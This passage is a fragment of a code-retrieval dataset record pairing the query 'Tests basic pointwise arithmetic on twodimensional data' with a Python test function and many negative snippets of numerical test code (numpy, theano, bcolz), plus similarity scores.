++\"\n\n with pytest.raises(LythSyntaxError) as err:\n token += \"5\"\n\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" ++\"\n\n assert err.value.msg is LythError.MISSING_SPACE_AFTER_OPERATOR\n assert err.value.filename == \"<stdin>\"\n assert err.value.lineno == 0\n assert err.value.offset == 1\n assert err.value.line == \" ++\"\n\n assert repr(token) == \"Token(INC, '++', 0, 1)\"\n assert str(token) == \"INC: '++'\"", "def make_function_stubs(self):\n res = \"\"\n for node in self.description.declarations() + self.description.definitions():\n if isinstance(node.type,pdl.TypeFunction):\n res += \"def {}({}):\\n pass\".format(node.name, \", \".join(map(\n lambda t: \"{}\".format(t.name), node.type.args)) )\n\n return res", "def factory_functions(self, route, docstring=\"\"):\n def generic_function(**kwargs):\n return self._get(route, params=kwargs)\n generic_function.__doc__ = docstring\n return generic_function", "def __call__(self, function: FuncStrArg):\n self._add_attr(function)\n return function", "def map_string2func(funcname, clss, compute_capability):\n if \"_get_\" + funcname not in globals():\n raise AttributeError(\"kernel type '\" + funcname + \"' not understood\")\n return globals()[\"_get_\" + funcname](clss, compute_capability)" ]
[ "0.6120692", "0.6099593", "0.5789169", "0.5777273", "0.5620227", "0.56047827", "0.55795795", "0.55412346", "0.55109686", "0.54903716", "0.5484314", "0.5438553", "0.5425026", "0.54227895", "0.5353313", "0.5350989", "0.53228265", "0.53207916", "0.5307697", "0.5287561", "0.5281127", "0.5280825", "0.52747303", "0.5257802", "0.52553564", "0.52550393", "0.5250104", "0.5248134", "0.52470785", "0.5228019", "0.5216738", "0.52088207", "0.51950306", "0.5191963", "0.5186365", "0.5178229", "0.51750886", "0.5148772", "0.51465863", "0.5138241", "0.51214576", "0.51143366", "0.5108677", "0.51079667", "0.5102555", "0.5102401", "0.50881034", "0.50783306", "0.5071918", "0.50648016", "0.5060347", "0.50579053", "0.50555634", "0.5038251", "0.5037413", "0.5027613", "0.502687", "0.5024428", "0.50233424", "0.5018096", "0.50123173", "0.49973443", "0.49909964", "0.4990763", "0.49894455", "0.4986234", "0.49859953", "0.49760732", "0.4975027", "0.4972083", "0.49667755", "0.49600118", "0.49522442", "0.49493355", "0.49351233", "0.49344134", "0.4931076", "0.4931076", "0.4923678", "0.49169096", "0.49149737", "0.4911118", "0.49086535", "0.49066395", "0.49033085", "0.4902465", "0.4902322", "0.48781157", "0.48768586", "0.48766613", "0.48747414", "0.48744065", "0.4872286", "0.48693642", "0.48665452", "0.48630428", "0.48630047", "0.48576513", "0.48549813", "0.48514476", "0.4846257" ]
0.0
-1
Tests basic pointwise arithmetic on twodimensional data
def test_flat(self, expr, result, mode): i, j = dimify('i j') a = symbol(name='a', dimensions=(i, j), value=2., mode=mode) b = symbol(name='b', dimensions=(i, j), value=3., mode=mode) fa = a.base.function if mode == 'indexed' else a fb = b.base.function if mode == 'indexed' else b eqn = eval(expr) Operator(eqn)(fa, fb) assert np.allclose(fa.data, result, rtol=1e-12)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_data():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n z = np.array([0.064, 4.489, 6.241, 0.1, 2.704, 2.809, 9.604, 1.156,\n 0.225, 3.364], dtype=float)\n\n return x, y, z", "def TestFunc1(x):\r\n return 12*x[0]*x[0] + 4*x[1]*x[1] - 12*x[0]*x[1] + 2*x[1]", "def test_two_round_data_points(self):\r\n values = [2, 3]\r\n expect_mean_result = 2.5\r\n expected_sd_result = .5\r\n result = multipoint_mean_sd(values)\r\n\r\n self.assertEqual(expect_mean_result, result['mean_result'])\r\n self.assertEqual(expected_sd_result, result['sd_result'])", "def test_points_calculation(self):\n\n assert self.test_shape.points == [\n (1030.0, 525.0),\n (1030.0, 475.0),\n (970.0, 475.0),\n (970.0, 525.0),\n ]", "def test_results():\n x = 0.5\n np.testing.assert_almost_equal(nbf.sum_x_n_calc(\n x, z_n, k_n_1), npf.sum_x_n_calc(x, z_n, k_n_1))", "def test_sum_squares(self):\n fun = get_problem('sum_squares', self.dimension)\n self.assertEqual(fun(self.array), 0.0)", "def test_equal7():\n x = randtool(\"float\", -10, 10, [3, 3, 1])\n y = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_mul(x, y):\n\n assert mul(x, y) == pytest.approx(mul(y, x))", "def TestFunc2(x):\r\n return 10*(-0.02*x[0] + 0.5*x[0]*x[0] + x[1])**2 \\\r\n + 128*(-0.02*x[0] + 0.5*x[0]*x[0] - x[1]/4) \\\r\n - (8e-5)*x[0]", "def test_elemwise_multiple_inputs_optimisation(self):\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n# (fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx+dy+dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx*dy*dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (dx*dy*(dx+dy+dz),(dx,dy,dz),(dxv,dyv,dzv),2,'float64'),\r\n# (fx*fy*(fx+fy+dz),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type add\r\n# (dz*fy*(fx+fy),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (2+fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (2*fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (fx*fy*2*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (fx*fy*(2+fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n (fx * fy * 2 * (fx + fy + fz+2), (fx, fy, fz), (fxv, fyv, fzv), 2, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n\r\n #check with broadcast of row\r\n# (fx+fy+fz+fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fz*fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv+fx+fy+fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv*fx*fy*fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fv*(fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*fv*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (dx+dy+dz+dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dz*dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv+dx+dy+dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv*dx*dy*dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dv*(dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*dv*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_scalar(self):\r\n x = scalar('x')\r\n p = ptp(x)\r\n f = theano.function([x], p)\r\n\r\n y = numpy.asarray(rand() * 2000 - 1000, dtype=config.floatX)\r\n result = f(y)\r\n numpyResult = numpy.ptp(y)\r\n\r\n self.assertTrue(numpy.array_equal(result, numpyResult))", "def test_equal6():\n x = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n y = randtool(\"float\", -10, 10, [3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def check_evaluation_points(x, y):\n assert x.ndim == y.ndim == 1\n assert x.shape == y.shape\n assert x.dtype == y.dtype == np.float64", "def test_local_dot22_to_dot22scalar():\r\n A = T.dmatrix()\r\n mode = theano.compile.mode.get_default_mode()\r\n opt = theano.tensor.opt.in2out(\r\n theano.tensor.blas.local_dot22_to_dot22scalar)\r\n mode = mode.__class__(optimizer=opt)\r\n\r\n x = T.dscalar()\r\n y = T.dscalar()\r\n z = T.dscalar()\r\n # make sure to don't have dimshuffle as we don't opt those cases\r\n m = T.dmatrix()\r\n r = T.drow()\r\n for idx, node in enumerate([\r\n #Old working cases\r\n T.mul(_dot22(A, A), x),\r\n T.mul(_dot22(A, A), x, y),\r\n T.mul(_dot22(A, A), x, r),\r\n T.mul(_dot22(A, A), m, x),\r\n T.mul(_dot22(A, A), x, m),\r\n T.mul(_dot22(A, A), x, (m * y)),\r\n T.mul(_dot22(A, A), (m * y), x),\r\n T.mul(_dot22(A, A), x, (r * y)),\r\n T.mul(_dot22(A, A), (r * y), x),\r\n T.mul(_dot22(A, A), (x * y), (m * x)),\r\n T.mul(_dot22(A, A), (r * y), (y * x)),\r\n\r\n # Case that was raising an assert that is fixed in gh-1507\r\n T.mul(_dot22(A, A), (m * y), m),\r\n T.mul(_dot22(A, A), m, (m * y)),\r\n T.mul(_dot22(A, A), (r * y), (m * x)),\r\n\r\n # assert fixed in gh-1507 and opt case added in gh-1515\r\n T.mul(_dot22(A, A), (m * y * z), m),\r\n T.mul(_dot22(A, A), m, (m * y * z)),\r\n\r\n # Opt case added in gh-1515\r\n T.mul(_dot22(A, A), T.mul(m, y, z), m),\r\n T.mul(_dot22(A, A), m, T.mul(m, y, z)),\r\n\r\n #Case that opt later in gh-1515\r\n T.mul(_dot22(A, A), (r * m), (m * x)),\r\n ]):\r\n node2 = theano.tensor.blas.local_dot22_to_dot22scalar.transform(\r\n node.owner)\r\n assert node2\r\n f = theano.function([x, y, z, m, r, A], node,\r\n mode=mode, on_unused_input='ignore')\r\n f(.1, .2, .3, [[1, 2], [3, 4]], [[5, 6]], [[7, 8], [9, 10]])", "def test_mul(x, y):\n\n assert mul(x, y) == mul(y, x)", "def test_basic_calculation(self):\n expected_result = np.array(\n [\n [[0.5, 0.5, 0.0], [0.5, 0.5, 0.4], [0.9, 0.5, 0.4]],\n [[0.5, 0.5, 0.0], [0.5, 0.5, 0.4], [0.9, 0.5, 0.4]],\n ],\n dtype=np.float32,\n )\n result = calculate_sleet_probability(self.rain_prob_cube, self.snow_prob_cube)\n self.assertArrayAlmostEqual(result.data, expected_result)\n self.assertTrue(result.dtype == np.float32)", "def test_multidimensional_operation(self):\n # start with something (1, 2, 3)\n data = np.array([[[0.0, 1.0, 2.0], [3.0, 4.0, 5.0]]])\n\n # split 1st dim (2, 2, 3)\n coefficients = np.ones((1, 2)) / 2\n expected = np.array(\n [[[0.0, 0.5, 1.0], [1.5, 2.0, 2.5]], [[0.0, 0.5, 1.0], [1.5, 2.0, 2.5]]]\n )\n actual = Adaptor.convert_with_coefficients(data, coefficients, 0)\n np.testing.assert_allclose(actual, expected)\n\n # sum 3rd dim (2, 2, 1)\n coefficients = np.ones((3, 1))\n expected = np.array([[[1.5], [6.0]], [[1.5], [6.0]]])\n actual = Adaptor.convert_with_coefficients(actual, coefficients, 2)\n np.testing.assert_allclose(actual, expected)", "def test_alpine1(self):\n fun = get_problem('alpine1', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def test_safe_sum_p_log_p(self):\r\n m = array([2, 4, 0, 8])\r\n self.assertEqual(safe_sum_p_log_p(m, 2), 2 * 1 + 4 * 2 + 8 * 3)", "def test_suite():\r\n test(slope(5, 3, 4, 2) == 1.0)\r\n test(slope(1, 2, 3, 2) == 0.0)\r\n test(slope(1, 2, 3, 3) == 0.5)\r\n test(slope(2, 4, 1, 2) == 2.0)", "def test_equal12():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([[True, False, True], [False, False, False], [True, True, False]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_equal11():\n x = np.array([[True, False, True]])\n y = np.array([[[[[True, False, True], [True, False, True], [True, False, True]]]]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test02(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n cr = bcolz.eval(\"a * b\", rootdir=self.rootdir)\n nr = a * b\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_adding(self):\n adder = Adder()\n\n for i in range(-10, 10):\n for j in range(-10, 10):\n self.assertEqual(i + j, adder.calc(j, i))", "def test_coords():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n\n return x, y", "def test12(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a), bcolz.carray(b, rootdir=self.rootdir)\n cr = bcolz.eval(\"c + 2 * d - 3\", out_flavor='numpy')\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr, type(cr)\n # print \"numpy ->\", nr\n self.assertTrue(type(cr) == np.ndarray)\n assert_array_equal(cr, nr, \"eval does not work correctly\")", "def CustomMathTest(): \n \n def CheckEqual(iterator):\n return len(set(iterator)) <= 1\n \n print(\"\")\n print(\" ..Testing.. \")\n print(\"\")\n \n Tests = []\n\n #Setup\n c = [1,2,3,nan,3]\n c2 = ma.masked_array(c,isnan(c))\n #Python has a less-comfortable handling of missing values.\n c3 = [2,3,-1,4,0]\n \n\n print(\"Testing MeanNa...\")\n Expected = [1.0, 2.0, 3.0, 2.25, 3.0]\n Actual = MeanNa(c2)\n print(Expected)\n print(Actual)\n print(CheckEqual(Actual==Expected))\n Tests.append(CheckEqual(Actual==Expected))\n print(\"\")\n \n print(\"Testing Catch...\")\n Expected = [0,1,.5,0]\n Actual = [Catch(.4),Catch(.6),Catch(.4,.3),Catch(.4,.1)]\n print(Expected)\n print(Actual)\n print(Actual==Expected)\n Tests.append((Actual==Expected))\n print(\"\")\n \n print(\"Testing Influence...\")\n Expected = [array([ 0.88888889]), array([ 1.33333333]), array([ 1.]), array([ 1.33333333])]\n Actual = Influence(GetWeight(c2))\n print(Expected)\n print(Actual)\n Out = []\n Flag=False\n for i in range(len(Actual)): #rounding problems require an approximation\n Out.append( (Actual[i]-Expected[i])**2)\n if(sum(Out)<.000000000001):\n Flag=True\n print(Flag)\n Tests.append(Flag) \n print(\"\")\n \n print(\"Testing ReWeight...\")\n Expected = [0.08888888888888889, 0.17777777777777778, 0.26666666666666666, 0.2, 0.26666666666666666]\n Actual = ReWeight(c2)\n print(Expected)\n print(Actual)\n print(CheckEqual(Actual==Expected))\n Tests.append(CheckEqual(Actual==Expected))\n print(\"\")\n \n Votes = array([[1,1,0,0], \n [1,0,0,0],\n [1,1,0,0],\n [1,1,1,0],\n [0,0,1,1],\n [0,0,1,1]])\n \n Votes = ma.masked_array(Votes,isnan(Votes))\n \n print(\"Testing ReverseMatrix...\")\n Expected = array([[0, 0, 1, 1],\n [0, 1, 1, 1],\n [0, 0, 1, 1],\n [0, 0, 0, 1],\n [1, 1, 0, 0],\n [1, 1, 0, 0]])\n Actual = ReverseMatrix(Votes)\n print(Expected)\n print(Actual)\n Flag=False\n if(sum(Expected==Actual)==24):\n Flag=True\n print(Flag)\n Tests.append(Flag)\n print(\"\") \n \n print(\"Testing WeightedPrinComp...\")\n Expected = array([-0.81674714, -0.35969107, -0.81674714, -0.35969107, 1.17643821, 1.17643821])\n Actual = WeightedPrinComp(Votes)[1]\n Out = []\n Flag=False\n for i in range(len(Actual)): #rounding problems require an approximation\n Out.append( (Actual[i]-Expected[i])**2)\n if(sum(Out)<.000000000001):\n Flag=True \n print(Flag)\n Tests.append(Flag) \n print(\"\") \n \n print(\" *** TEST RESULTS ***\")\n print(Tests)\n print(CheckEqual(Tests))\n \n return(CheckEqual(Tests))", "def test_equal13():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_xy(self):\n x = np.array([[1,3], [2,8], [1,3]])\n y = np.array([1,1,-1])\n lro = LogisticRegressionOptimiser(x,y)\n expected = np.array([[1,3], [2,8], [-1,-3]])\n for i in 0,1,2:\n for j in 0,1:\n self.assertEqual(lro.xy[i][j], expected[i][j])", "def test_fun_result(self):\n x = CArray([3, 5])\n correct_result = x[0] ** 2 + x[1] ** 2\n self._test_fun_result(self.fun, x, correct_result.item())", "def test_binops(self):", "def test__point_right_addition__given_vector_and_point__return_correct_point():\n assert Vector((0, 1, 2)) + Point((3, 4, 5)) == Point((3, 5, 7))", "def test01(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"c * d\")\n nr = a * b\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_analytical_vs_numerical():\n pass", "def test_multiplying(self):\n multiplier = Multiplier()\n\n for i in range(-10, 10):\n for j in range(-10, 10):\n self.assertEqual(i*j, multiplier.calc(j, i))", "def test_equal14():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_single_quadrant(self):", "def test_scalar_multiplication(self):\n\n a1 = tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 1, -2, 3, -4)\n a2 = a1 * 3.5\n a3 = a1 * 0.5\n\n self.assertEqual(a2,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 3.5, -7, 10.5, -14))\n self.assertEqual(a3,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 0.5, -1, 1.5, -2))", "def wilcoxon_test(data):\n n = len(data)\n print(n)\n absolute_values = []\n for d in data:\n absolute_values.append((d, np.abs(d)))\n\n absolute_values.sort(key=lambda x: x[1])\n ret = []\n for i, d in enumerate(absolute_values):\n ret.append((i + 1, d[0], d[1]))\n\n t_plus = 0\n t_minus = 0\n for tup in ret:\n if tup[1] < 0:\n t_minus += tup[0]\n else:\n t_plus += tup[0]\n\n w = min(t_plus, t_minus)\n\n E_w = n * (n + 1) / 4\n se = np.sqrt(n * (n+1) * (2*n+1)/24)\n z = (w - E_w) / se\n p_value = 2. * norm.sf(abs(z)) # two sided test\n\n return z, p_value", "def test_many_round_data_points(self):\r\n values = [1, 1, 3, 5, 8, 3, 9, 2, 6, 2]\r\n expect_mean_result = 4\r\n expected_sd_result = 2.72029\r\n result = multipoint_mean_sd(values)\r\n\r\n self.assertEqual(expect_mean_result, result['mean_result'])\r\n self.assertAlmostEqual(expected_sd_result, result['sd_result'], 4)", "def test_equal15():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = x\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_equal9():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([True, False, True])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_positive_slope(self):\n slopes = []\n for i in range(100):\n neighborhood, pc = create_point_cloud_in_plane_and_neighborhood()\n slopes += list(EigenValueVectorizeFeatureExtractor().extract(pc, neighborhood, None, None, None)[6])\n np.testing.assert_array_less(np.zeros_like(slopes), slopes)", "def test_doubles(self):\n self.assertEqual(doubles(self.TestData), 3)\n self.assertEqual(doubles(array([0,3,4])), 0)\n self.assertEqual(doubles(array([2])), 1)", "def test_point_within_dimensions_true():\n point = np.array([10, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_shift_point(self):\n point = (0,0)\n new_point = utils.shift_point(point, 3, 4)\n self.assertEqual((3,4), new_point)\n\n point = (-2.34, 1.19)\n new_point = utils.shift_point(point, 2.34, -1.19)\n self.assertEqual((0,0), new_point)", "def test_2d_2d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(point):\n x, y = point\n return [x**2, y]\n \n a = func((1, 1))\n self.assertEqual(len(self.storage), 1)\n self.assertEqual(a, [1**2, 1])\n \n a = func((2, 1))\n self.assertEqual(len(self.storage), 2)\n self.assertEqual(a, [2**2, 1])\n \n a = func((1, 2))\n self.assertEqual(len(self.storage), 3)\n self.assertEqual(a, [1**2, 2])\n \n a = func((2, 2))\n self.assertEqual(len(self.storage), 4)\n self.assertEqual(a, [2**2, 2])\n \n a = func((1.5, 1.5))\n self.assertEqual(len(self.storage), 4)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def test_calculate_distance():\n\n r1 = np.array([0, 0, 0])\n r2 = np.array([0, 1, 0])\n\n expected_distance = 1\n\n calculated_distance = molecool.calculate_distance(r1, r2)\n\n assert expected_distance == calculated_distance", "def test_elemwise1():\r\n\r\n shape = (3, 4)\r\n a = tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32') + 0.5, 'a')\r\n b = tensor.fmatrix()\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, b ** a)], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, tensor.exp(b ** a))], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, a + b * tensor.exp(b ** a))],\r\n mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)", "def test04(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"a + 2 * d - 3\")\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_r():\n y, x = np.indices((10,20))\n\n default_use_numexpr = accel_math._USE_NUMEXPR\n\n accel_math._USE_NUMEXPR = True\n r1 = accel_math._r(x,y)\n\n accel_math._USE_NUMEXPR = False\n r2 = accel_math._r(x,y)\n\n np.testing.assert_almost_equal(r1,r2)\n\n accel_math._USE_NUMEXPR = default_use_numexpr", "def test_vectorized_loss_single_data_point_correct(self):\n W, x, b, correct_class_index, grad_W, grad_b = single_point_correct_test_data() # noqa\n\n loss = vectorized_loss(x, correct_class_index, W, b)\n np.testing.assert_almost_equal(loss, 21)", "def test_equal10():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([[True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_single(self):\n df = self.df.head(1).copy()\n n = df.index.size\n arr = df.values\n out = np_cross_ratios(arr)\n self.assertTrue(np.isfinite(out).any())\n self.assertTrue((out[np.isfinite(out)] > 0).all())\n self.assertTrue(out.shape == (n, self.d, self.d))", "def test_alpine2(self):\n fun = get_problem('alpine2', self.dimension, 0.0, 10.0)\n self.assertAlmostEqual(fun(self.array8), np.power(2.8081311800070053291, self.dimension))", "def test_multiple(self):\n df = self.df.copy()\n out = compositional_mean(df)\n # Check closure\n self.assertTrue(np.allclose(np.sum(out.values, axis=-1), 1.0))", "def testDotProduct(self):\n\n self._check([0.000, 1.000, 0.000], [ 1023, 1023, 1023 ])\n self._check([0.125, 0.750, 0.125], [ 1023, 1023, 1023 ])\n self._check([1/32., 1.000, 0.000], [ 1023, 1023, 1023 ])\n self._check([1.000, 1.000, 1.000], [ 1023, 1023, 1023 ])\n self._check([0, 0, 0], [ 1023, 1023, 1023 ])\n self._check([1/32., 0, 0], [ 1, 100, 100 ])\n self._check([1.0, 0, 0], [ 1, 100, 100 ])\n self._check([0, 1.0, 0], [ 1, 100, 100 ])\n self._check([0, 0, 1.0], [ 1, 100, 100 ])\n self._check([1.000, 1.000, 1.000], [ 513, 513, 513 ])\n self._check([1.000, 1.000, 1.000], [ 512, 512, 512 ])\n self._check([1.000, 1.000, 1.000], [ 0, 512, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 680, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 681, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 682, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 683, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 339, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 340, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 341, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 342, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 1023-338, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-339, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-340, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-341, 0 ])\n\n self._check([0.000, -1.0, 0.000], [ 0, 500, 0 ])\n self._check([1/32., -1.0, 1/32.], [ 500, 500, 500 ])\n self._check([-1/32., -1.0, -1/32.], [ 400, 400, 400 ])\n\n for idx in range(100):\n data = [ random.randint(0,1023) for r in range(3) ]\n 